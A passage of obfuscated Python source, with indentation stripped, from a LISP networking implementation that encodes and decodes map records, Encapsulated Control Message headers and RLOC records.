if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 85 - 85: iII111i + OOooOOo
self . record_ttl , self . rloc_count , self . eid . mask_len , OOo000 , self . map_version , self . eid . afi = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
self . record_ttl = socket . ntohl ( self . record_ttl )
OOo000 = socket . ntohs ( OOo000 )
self . action = ( OOo000 >> 13 ) & 0x7
self . authoritative = True if ( ( OOo000 >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( OOo000 >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ ooOoooOoo0oO : : ]
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , O0o00oOOOO00 = self . eid . lcaf_decode_eid ( packet )
if ( O0o00oOOOO00 ) : self . group = O0o00oOOOO00
self . group . instance_id = self . eid . instance_id
return ( packet )
if 53 - 53: OoOoOO00 . oO0o - OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
packet = self . eid . unpack_address ( packet )
return ( packet )
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
if 65 - 65: ooOoO0o + IiII - OoOoOO00 % II111iiii - iIii1I11I1II1
if 39 - 39: I1IiiI + I1ii11iIi11i - i11iIiiIii
if 43 - 43: iIii1I11I1II1
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 71 - 71: Ii1I
class lisp_ecm ( ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 43 - 43: o0oOOo0O0Ooo / ooOoO0o
if 88 - 88: i11iIiiIii - i1IIi + Oo0Ooo - O0
def print_ecm ( self ) :
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 50 - 50: I1ii11iIi11i
lprint ( oOOo0ooO0 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 37 - 37: oO0o % iII111i / II111iiii / OoO0O00 - IiII - ooOoO0o
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
if 61 - 61: I11i / OOooOOo
if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
ooo0OOoo = ( LISP_ECM << 28 )
if ( self . security ) : ooo0OOoo |= 0x08000000
if ( self . ddt ) : ooo0OOoo |= 0x04000000
if ( self . to_etr ) : ooo0OOoo |= 0x02000000
if ( self . to_ms ) : ooo0OOoo |= 0x01000000
if 66 - 66: I1IiiI . OOooOOo - OoO0O00 % Oo0Ooo * o0oOOo0O0Ooo - oO0o
O0ooOOo0 = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
if 32 - 32: O0 + I1Ii111
Ooo0oO = ""
if ( self . afi == LISP_AFI_IPV4 ) :
Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
Ooo0oO += self . source . pack_address ( )
Ooo0oO += self . dest . pack_address ( )
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
if 11 - 11: i1IIi
if ( self . afi == LISP_AFI_IPV6 ) :
Ooo0oO = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
Ooo0oO += self . source . pack_address ( )
Ooo0oO += self . dest . pack_address ( )
if 65 - 65: OoO0O00 . ooOoO0o
if 12 - 12: I1Ii111 + O0 - oO0o . IiII
IiII1iiI = socket . htons ( self . udp_sport )
OooOOOoOoo0O0 = socket . htons ( self . udp_dport )
I1111III111ii = socket . htons ( self . udp_length )
Ooo0OO00oo = socket . htons ( self . udp_checksum )
o0oOo00 = struct . pack ( "HHHH" , IiII1iiI , OooOOOoOoo0O0 , I1111III111ii , Ooo0OO00oo )
return ( O0ooOOo0 + Ooo0oO + o0oOo00 )
if 46 - 46: IiII . ooOoO0o / iII111i
if 63 - 63: II111iiii - I1ii11iIi11i * II111iiii
def decode ( self , packet ) :
if 92 - 92: OoO0O00 % ooOoO0o * O0 % iIii1I11I1II1 / i1IIi / OoOoOO00
if 67 - 67: I1Ii111 + I11i + I1Ii111 . OOooOOo % o0oOOo0O0Ooo / ooOoO0o
if 78 - 78: I1ii11iIi11i . O0
if 56 - 56: oO0o - i1IIi * O0 / I11i * I1IiiI . I11i
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 54 - 54: i11iIiiIii % i1IIi + Oo0Ooo / OoOoOO00
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 26 - 26: I11i . I1ii11iIi11i
ooo0OOoo = socket . ntohl ( ooo0OOoo [ 0 ] )
self . security = True if ( ooo0OOoo & 0x08000000 ) else False
self . ddt = True if ( ooo0OOoo & 0x04000000 ) else False
self . to_etr = True if ( ooo0OOoo & 0x02000000 ) else False
self . to_ms = True if ( ooo0OOoo & 0x01000000 ) else False
packet = packet [ ooOoooOoo0oO : : ]
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
if ( len ( packet ) < 1 ) : return ( None )
IiiI1Ii1II = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
IiiI1Ii1II = IiiI1Ii1II >> 4
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
if ( IiiI1Ii1II == 4 ) :
ooOoooOoo0oO = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
O0o000 , I1111III111ii , O0o000 , Ii1i11iIi1iII , III1I1Iii1 , Ooo0OO00oo = struct . unpack ( "HHIBBH" , packet [ : ooOoooOoo0oO ] )
self . length = socket . ntohs ( I1111III111ii )
self . ttl = Ii1i11iIi1iII
self . protocol = III1I1Iii1
self . ip_checksum = socket . ntohs ( Ooo0OO00oo )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 23 - 23: I11i + IiII . oO0o
if 33 - 33: OoO0O00 / i11iIiiIii / i1IIi . IiII
if 7 - 7: Oo0Ooo + IiII
if 15 - 15: iIii1I11I1II1 % OoOoOO00 + i1IIi . Ii1I - Oo0Ooo
III1I1Iii1 = struct . pack ( "H" , 0 )
oOOoo0O00 = struct . calcsize ( "HHIBB" )
i111 = struct . calcsize ( "H" )
packet = packet [ : oOOoo0O00 ] + III1I1Iii1 + packet [ oOOoo0O00 + i111 : ]
if 33 - 33: I1IiiI % I11i . I1Ii111 / Ii1I * II111iiii * o0oOOo0O0Ooo
packet = packet [ ooOoooOoo0oO : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 49 - 49: i1IIi * i11iIiiIii
if 47 - 47: II111iiii / Oo0Ooo
if ( IiiI1Ii1II == 6 ) :
ooOoooOoo0oO = struct . calcsize ( "IHBB" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 38 - 38: OOooOOo . iII111i / O0 . Ii1I / OoOoOO00
O0o000 , I1111III111ii , III1I1Iii1 , Ii1i11iIi1iII = struct . unpack ( "IHBB" , packet [ : ooOoooOoo0oO ] )
self . length = socket . ntohs ( I1111III111ii )
self . protocol = III1I1Iii1
self . ttl = Ii1i11iIi1iII
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 52 - 52: O0 / i11iIiiIii * I1IiiI . i1IIi
packet = packet [ ooOoooOoo0oO : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 50 - 50: OoooooooOO . iII111i % o0oOOo0O0Ooo
if 6 - 6: ooOoO0o - i1IIi . O0 . i1IIi . OoOoOO00
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 42 - 42: i11iIiiIii * O0 % i11iIiiIii + OOooOOo
ooOoooOoo0oO = struct . calcsize ( "HHHH" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 64 - 64: I1IiiI / OoOoOO00
IiII1iiI , OooOOOoOoo0O0 , I1111III111ii , Ooo0OO00oo = struct . unpack ( "HHHH" , packet [ : ooOoooOoo0oO ] )
self . udp_sport = socket . ntohs ( IiII1iiI )
self . udp_dport = socket . ntohs ( OooOOOoOoo0O0 )
self . udp_length = socket . ntohs ( I1111III111ii )
self . udp_checksum = socket . ntohs ( Ooo0OO00oo )
packet = packet [ ooOoooOoo0oO : : ]
return ( packet )
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if 84 - 84: O0 % Ii1I
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
if 31 - 31: O0 . I1IiiI
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
if 58 - 58: i1IIi * Ii1I / ooOoO0o % iIii1I11I1II1
if 24 - 24: OoOoOO00 - o0oOOo0O0Ooo * I1IiiI . I11i / OoO0O00 * Ii1I
if 12 - 12: OoooooooOO % oO0o
if 92 - 92: ooOoO0o % OoO0O00 + O0 + OoOoOO00 / OoO0O00 * iIii1I11I1II1
if 79 - 79: O0
if 71 - 71: OoO0O00 - O0
if 73 - 73: iIii1I11I1II1
if 7 - 7: OoOoOO00
if 55 - 55: oO0o . OoO0O00 + iIii1I11I1II1 + OoOoOO00 / I1ii11iIi11i - O0
if 14 - 14: II111iiii - OoO0O00 - O0 * OoooooooOO / I1IiiI
if 3 - 3: I11i
if 46 - 46: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1
if 25 - 25: II111iiii / OOooOOo + Oo0Ooo - iIii1I11I1II1 - OoOoOO00
if 97 - 97: OOooOOo . OOooOOo / I1ii11iIi11i + I1IiiI * i1IIi
if 53 - 53: O0
if 28 - 28: iII111i % OoO0O00 . OoO0O00 / IiII * Oo0Ooo * iII111i
if 49 - 49: I1IiiI / I1Ii111 * iII111i + I1IiiI % oO0o % ooOoO0o
if 27 - 27: OoO0O00 / iII111i . I1ii11iIi11i
if 71 - 71: OoO0O00 . i11iIiiIii . iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo
if 34 - 34: iII111i
class lisp_rloc_record ( ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 6 - 6: OoO0O00 . OoOoOO00 + I1ii11iIi11i
if 24 - 24: OoO0O00 . Ii1I
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
IiIi1I1i1iII = self . rloc_name
if ( cour ) : IiIi1I1i1iII = lisp_print_cour ( IiIi1I1i1iII )
return ( 'rloc-name: {}' . format ( blue ( IiIi1I1i1iII , cour ) ) )
if 86 - 86: I11i % I1Ii111 . I11i * IiII + IiII + II111iiii
if 66 - 66: oO0o / O0 - OoOoOO00
def print_record ( self , indent ) :
o0O00oo0O = self . print_rloc_name ( )
if ( o0O00oo0O != "" ) : o0O00oo0O = ", " + o0O00oo0O
OooO0ooO0o0OO = ""
if ( self . geo ) :
oO00 = ""
if ( self . geo . geo_name ) : oO00 = "'{}' " . format ( self . geo . geo_name )
OooO0ooO0o0OO = ", geo: {}{}" . format ( oO00 , self . geo . print_geo ( ) )
if 79 - 79: i11iIiiIii + iIii1I11I1II1 . OoooooooOO % iII111i % IiII
OoOo0Oo0 = ""
if ( self . elp ) :
oO00 = ""
if ( self . elp . elp_name ) : oO00 = "'{}' " . format ( self . elp . elp_name )
OoOo0Oo0 = ", elp: {}{}" . format ( oO00 , self . elp . print_elp ( True ) )
if 43 - 43: i11iIiiIii - OoooooooOO % ooOoO0o
oO0O0Oo000 = ""
if ( self . rle ) :
oO00 = ""
if ( self . rle . rle_name ) : oO00 = "'{}' " . format ( self . rle . rle_name )
oO0O0Oo000 = ", rle: {}{}" . format ( oO00 , self . rle . print_rle ( False , True ) )
if 60 - 60: ooOoO0o
oo0oO0oOoo = ""
if ( self . json ) :
oO00 = ""
if ( self . json . json_name ) :
oO00 = "'{}' " . format ( self . json . json_name )
if 66 - 66: iIii1I11I1II1 . Oo0Ooo / Ii1I + OOooOOo - O0 % IiII
oo0oO0oOoo = ", json: {}" . format ( self . json . print_json ( False ) )
if 22 - 22: oO0o - i11iIiiIii % O0 / II111iiii
if 28 - 28: OoO0O00
o0oOoOoooO = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
o0oOoOoooO = ", " + self . keys [ 1 ] . print_keys ( )
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
oOOo0ooO0 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( oOOo0ooO0 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , o0O00oo0O , OooO0ooO0o0OO ,
OoOo0Oo0 , oO0O0Oo000 , oo0oO0oOoo , o0oOoOoooO ) )
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
def store_rloc_entry ( self , rloc_entry ) :
oOo00O = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 5 - 5: II111iiii - o0oOOo0O0Ooo + i1IIi - Ii1I % i11iIiiIii
self . rloc . copy_address ( oOo00O )
if 79 - 79: iII111i . Ii1I / OoO0O00
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 57 - 57: O0 / I11i + I1IiiI . IiII
if 38 - 38: i1IIi . iII111i
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
oO00 = rloc_entry . geo_name
if ( oO00 and lisp_geo_list . has_key ( oO00 ) ) :
self . geo = lisp_geo_list [ oO00 ]
if 47 - 47: o0oOOo0O0Ooo * I1ii11iIi11i
if 48 - 48: oO0o * i1IIi % iII111i * Ii1I * I1Ii111 + ooOoO0o
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
oO00 = rloc_entry . elp_name
if ( oO00 and lisp_elp_list . has_key ( oO00 ) ) :
self . elp = lisp_elp_list [ oO00 ]
if 12 - 12: iIii1I11I1II1 - I11i . I1Ii111 - Ii1I / OoO0O00 . O0
if 8 - 8: II111iiii % OOooOOo / IiII + I1IiiI * OOooOOo
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
oO00 = rloc_entry . rle_name
if ( oO00 and lisp_rle_list . has_key ( oO00 ) ) :
self . rle = lisp_rle_list [ oO00 ]
if 85 - 85: OoOoOO00 + iII111i % I1Ii111 % OOooOOo * I1ii11iIi11i
if 48 - 48: OoO0O00 % OoO0O00 % OoOoOO00
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
oO00 = rloc_entry . json_name
if ( oO00 and lisp_json_list . has_key ( oO00 ) ) :
self . json = lisp_json_list [ oO00 ]
if 30 - 30: Oo0Ooo % OoooooooOO * i11iIiiIii % oO0o
if 37 - 37: iII111i
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
def encode_lcaf ( self ) :
o0O000Ooo = socket . htons ( LISP_AFI_LCAF )
OOoooooO = ""
if ( self . geo ) :
OOoooooO = self . geo . encode_geo ( )
if 65 - 65: I1Ii111
if 33 - 33: O0 . I1Ii111 % i11iIiiIii + OoO0O00 . I1ii11iIi11i
O0O00ooO0O0O = ""
if ( self . elp ) :
Iiii1II = ""
for Ooo0o0OoOO in self . elp . elp_nodes :
O000oOOoOOO = socket . htons ( Ooo0o0OoOO . address . afi )
ooOOooooo0Oo = 0
if ( Ooo0o0OoOO . eid ) : ooOOooooo0Oo |= 0x4
if ( Ooo0o0OoOO . probe ) : ooOOooooo0Oo |= 0x2
if ( Ooo0o0OoOO . strict ) : ooOOooooo0Oo |= 0x1
ooOOooooo0Oo = socket . htons ( ooOOooooo0Oo )
Iiii1II += struct . pack ( "HH" , ooOOooooo0Oo , O000oOOoOOO )
Iiii1II += Ooo0o0OoOO . address . pack_address ( )
if 15 - 15: o0oOOo0O0Ooo / IiII / ooOoO0o * OoOoOO00
if 13 - 13: iII111i
OoOoo00oO = socket . htons ( len ( Iiii1II ) )
O0O00ooO0O0O = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , OoOoo00oO )
O0O00ooO0O0O += Iiii1II
if 56 - 56: iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
ooOOi1IiI1i1iI1Ii = ""
if ( self . rle ) :
O00O = ""
for iIIII1iiIII in self . rle . rle_nodes :
O000oOOoOOO = socket . htons ( iIIII1iiIII . address . afi )
O00O += struct . pack ( "HBBH" , 0 , 0 , iIIII1iiIII . level , O000oOOoOOO )
O00O += iIIII1iiIII . address . pack_address ( )
if ( iIIII1iiIII . rloc_name ) :
O00O += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
O00O += iIIII1iiIII . rloc_name + "\0"
if 99 - 99: OoOoOO00 / II111iiii % i11iIiiIii + I11i + O0
if 83 - 83: I1IiiI . i1IIi - i1IIi % OoO0O00 * oO0o * oO0o
if 30 - 30: I1ii11iIi11i
OOo = socket . htons ( len ( O00O ) )
ooOOi1IiI1i1iI1Ii = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , OOo )
ooOOi1IiI1i1iI1Ii += O00O
if 100 - 100: i11iIiiIii + OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo * OoOoOO00
if 87 - 87: o0oOOo0O0Ooo
oOOOOoO00o0oo = ""
if ( self . json ) :
iiii1 = socket . htons ( len ( self . json . json_string ) + 2 )
oo0ooOO = socket . htons ( len ( self . json . json_string ) )
oOOOOoO00o0oo = struct . pack ( "HBBBBHH" , o0O000Ooo , 0 , 0 , LISP_LCAF_JSON_TYPE ,
0 , iiii1 , oo0ooOO )
oOOOOoO00o0oo += self . json . json_string
oOOOOoO00o0oo += struct . pack ( "H" , 0 )
if 43 - 43: OOooOOo - OOooOOo . OoooooooOO
if 65 - 65: Oo0Ooo
oO000ooO = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
